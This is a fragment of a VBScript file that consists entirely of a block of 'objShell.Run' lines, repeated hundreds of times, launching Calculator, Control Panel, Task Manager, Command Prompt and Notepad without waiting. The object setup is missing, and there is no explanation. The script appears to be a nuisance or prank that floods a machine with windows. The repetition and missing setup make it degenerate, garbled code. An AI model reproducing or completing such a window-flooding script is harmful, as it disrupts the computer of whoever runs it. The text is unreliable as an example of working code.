objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
